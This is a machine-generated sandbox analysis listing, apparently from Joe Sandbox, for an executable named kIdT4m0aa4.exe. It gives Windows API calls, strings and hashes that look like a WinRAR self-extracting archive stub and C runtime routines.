                                                            • Instruction ID: bd91396eb8300915779c9058e1ec88604a07e9299aa538cc05306b0cc441069c
                                                            • Opcode Fuzzy Hash: 1a9640d37d13ee7d65a8729a9628e20b8d4c6299fa9fd6c11fec41118a4835b8
                                                            • Instruction Fuzzy Hash: 6EF116716083809BDB25EF28C4E5FFE77996F90300F08056DFD8A9B283CB649A45D762
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                            • Instruction ID: 6ff7ba4a208aa532897f291575f68526f314e0ada4a5112e245f6565554f92b2
                                                            • Opcode Fuzzy Hash: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                            • Instruction Fuzzy Hash: F551046E74032295DB30AA259811777B3E2DFA5750F68042BFFD18B7C0FB758E818261
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CEFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00CEF6CF
                                                            • __fassign.LIBCMT ref: 00CEF74A
                                                            • __fassign.LIBCMT ref: 00CEF765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CEF78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 1a10e0c6665e977fc4f5ea000eb9c2662eb093864fa6d1dff585486950edf452
                                                            • Instruction ID: a59308952565a12aad10b89e7d33d016f83caa2b6081c8ab4881ef758cc7ecbd
                                                            • Opcode Fuzzy Hash: 1a10e0c6665e977fc4f5ea000eb9c2662eb093864fa6d1dff585486950edf452
                                                            • Instruction Fuzzy Hash: BC5195B1900289AFDB10CFA5DC55BEEBBF4EF09300F14416EE555E7291D630AA42CBA1
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE2937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE29C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE29F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE2A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 9b0ff00414f9462877fcf717dd2d4eaed830786435422e6d93025eb632845421
                                                            • Instruction ID: a4af6e600449a7f7ed2bdb41fd1e18e2add349fdd0cd8f94d7abb16488d73d64
                                                            • Opcode Fuzzy Hash: 9b0ff00414f9462877fcf717dd2d4eaed830786435422e6d93025eb632845421
                                                            • Instruction Fuzzy Hash: F141DB30A00288AFCF10DF6AC885BAE7BB9EF44314F148065E9159B393D771DA41DF91
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00CD9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00CD9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00CD9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00CD9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00CD9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 14334100710e3d8b143fc41e7ba500131f21b43ed7e36342e43eb92e14507964
                                                            • Instruction ID: fdb64cb1e31c66fde1bc8965ee3f7b0f7c71133d067d59caa11f01cad1c1a818
                                                            • Opcode Fuzzy Hash: 14334100710e3d8b143fc41e7ba500131f21b43ed7e36342e43eb92e14507964
                                                            • Instruction Fuzzy Hash: BA41D331004310EFCB225FA5DC48B6B7BA8FF58701F00455AFA4AEA256DB38EA15CF65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 65439b8c146d5cfe08c5f52f0b4a4f005c5ba774a8392362f83a26ee8bedee31
                                                            • Instruction ID: 1ff2ea22f4cf5efc82f011bcce338f0387091c0f87963ce3996e2f9bdf295120
                                                            • Opcode Fuzzy Hash: 65439b8c146d5cfe08c5f52f0b4a4f005c5ba774a8392362f83a26ee8bedee31
                                                            • Instruction Fuzzy Hash: 4031903B64438556D634AB919C42B7B73A4EB90320F50442FF69E87380FB70BF4093A5
                                                            APIs
                                                              • Part of subcall function 00CEC868: _free.LIBCMT ref: 00CEC891
                                                            • _free.LIBCMT ref: 00CEC8F2
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CEC8FD
                                                            • _free.LIBCMT ref: 00CEC908
                                                            • _free.LIBCMT ref: 00CEC95C
                                                            • _free.LIBCMT ref: 00CEC967
                                                            • _free.LIBCMT ref: 00CEC972
                                                            • _free.LIBCMT ref: 00CEC97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: b4fb0e72a834beba8870529c639b8cc0ee1e0faa0912b0e4b778991724d002cc
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: D7112171580B85AAE530B7B3CD87FCB7BAC9F04B00F444C15B29D660D2DA75B60AA750
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CDE669,00CDE5CC,00CDE86D), ref: 00CDE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CDE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CDE630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                            • Instruction ID: 0c8afae9adf286ae41dfca87cd5aa24d4de1476f1ccda640d61e119ad1813283
                                                            • Opcode Fuzzy Hash: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                            • Instruction Fuzzy Hash: 70F0C23978166AAB0B216E765C8467A62C86A35755300443BFB15DB300EB10CE57AAA1
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD14C2
                                                              • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CD14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CD1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CD1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                            • Instruction ID: 116a628425041425fae7ddcb19d7b4dcb8f64720a2af96792425fd5eeeea57a0
                                                            • Opcode Fuzzy Hash: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                            • Instruction Fuzzy Hash: E131D775108345ABC704DFA8D884A9FB7E8BF98714F048A1EF995C3210E734D649CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE2B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2B2F
                                                            • SetLastError.KERNEL32(00000000,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 0d6925252b89d62c4ed9872d8a0c6f1a089b70730754927989fe41841c2b6f25
                                                            • Instruction ID: 079c0443349c9c496cb619b606790b09eab38698aeb6d253791013228af8ced5
                                                            • Opcode Fuzzy Hash: 0d6925252b89d62c4ed9872d8a0c6f1a089b70730754927989fe41841c2b6f25
                                                            • Instruction Fuzzy Hash: 0201D4321183926FA6242B777C89B3A2B9EEB51774760073AF121560F0EF956E00E545
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00D01030,00CE4674,00D01030,?,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE97E9
                                                            • _free.LIBCMT ref: 00CE981C
                                                            • _free.LIBCMT ref: 00CE9844
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE9851
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE985D
                                                            • _abort.LIBCMT ref: 00CE9863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDDC72
                                                            • TranslateMessage.USER32(?), ref: 00CDDC7C
                                                            • DispatchMessageW.USER32(?), ref: 00CDDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC91
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            APIs
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                              • Part of subcall function 00CCB92D: _wcsrchr.LIBVCRUNTIME ref: 00CCB944
                                                            • _wcslen.LIBCMT ref: 00CCC197
                                                            • _wcslen.LIBCMT ref: 00CCC1DF
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00CDCE9D
                                                              • Part of subcall function 00CCB690: _wcslen.LIBCMT ref: 00CCB696
                                                            • _swprintf.LIBCMT ref: 00CDCED1
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,00D0946A), ref: 00CDCEF1
                                                            • EndDialog.USER32(?,00000001), ref: 00CDCFFE
                                                            Strings
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CCBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CCA275,?,?,00000800,?,00CCA23A,?,00CC755C), ref: 00CCBBC5
                                                            • _wcslen.LIBCMT ref: 00CCBC3B
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 00CDB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDB712
                                                            • DeleteObject.GDI32(00000000), ref: 00CDB744
                                                            • DeleteObject.GDI32(00000000), ref: 00CDB767
                                                              • Part of subcall function 00CDA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                              • Part of subcall function 00CDA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                              • Part of subcall function 00CDA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                              • Part of subcall function 00CDA6C2: LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                              • Part of subcall function 00CDA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                              • Part of subcall function 00CDA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA73E
                                                              • Part of subcall function 00CDA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                              • Part of subcall function 00CDA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                              • Part of subcall function 00CDA6C2: GlobalFree.KERNEL32(00000000), ref: 00CDA7CD
                                                            Strings
                                                            Similarity
                                                            • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                            • String ID: ]
                                                            • API String ID: 1428510222-3352871620
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDD64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CDD661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDD675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00CDD684
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CE7E24,00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002), ref: 00CE7E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE7EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00CE7E24,00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002), ref: 00CE7EC9
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            APIs
                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                            • GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            APIs
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00CEBF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CEBF5C
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CEBF82
                                                            • _free.LIBCMT ref: 00CEBF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CEBFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00CE91AD,00CEB188,?,00CE9813,00000001,00000364,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE986E
                                                            • _free.LIBCMT ref: 00CE98A3
                                                            • _free.LIBCMT ref: 00CE98CA
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE98D7
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE98E0
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            APIs
                                                              • Part of subcall function 00CD11CF: ResetEvent.KERNEL32(?), ref: 00CD11E1
                                                              • Part of subcall function 00CD11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CD11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CD0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00CD0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00CD0F54
                                                            • CloseHandle.KERNEL32(?), ref: 00CD0F60
                                                            • CloseHandle.KERNEL32(?), ref: 00CD0F6C
                                                              • Part of subcall function 00CD0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CD1206,?), ref: 00CD0FEA
                                                              • Part of subcall function 00CD0FE4: GetLastError.KERNEL32(?), ref: 00CD0FF6
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            APIs
                                                            • _free.LIBCMT ref: 00CEC817
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CEC829
                                                            • _free.LIBCMT ref: 00CEC83B
                                                            • _free.LIBCMT ref: 00CEC84D
                                                            • _free.LIBCMT ref: 00CEC85F
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CD1FE5
                                                            • _wcslen.LIBCMT ref: 00CD1FF6
                                                            • _wcslen.LIBCMT ref: 00CD2006
                                                            • _wcslen.LIBCMT ref: 00CD2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CCB371,?,?,00000000,?,?,?), ref: 00CD202F
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            APIs
                                                            • _free.LIBCMT ref: 00CE891E
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CE8930
                                                            • _free.LIBCMT ref: 00CE8943
                                                            • _free.LIBCMT ref: 00CE8954
                                                            • _free.LIBCMT ref: 00CE8965
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kIdT4m0aa4.exe,00000104), ref: 00CE7FAE
                                                            • _free.LIBCMT ref: 00CE8079
                                                            • _free.LIBCMT ref: 00CE8083
                                                            Strings
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                            • API String ID: 2506810119-549195003
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE31FB
                                                            • _abort.LIBCMT ref: 00CE3306
                                                            Strings
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC7406
                                                              • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CC74CD
                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CDADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDADC2
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 00CCD954
                                                            • _strncpy.LIBCMT ref: 00CCD99A
                                                              • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D01030,00000200,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00CD0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CDB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CDB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CC7F69,?,?,?), ref: 00CCA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CC7F69,?), ref: 00CCA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?), ref: 00CCA4BF
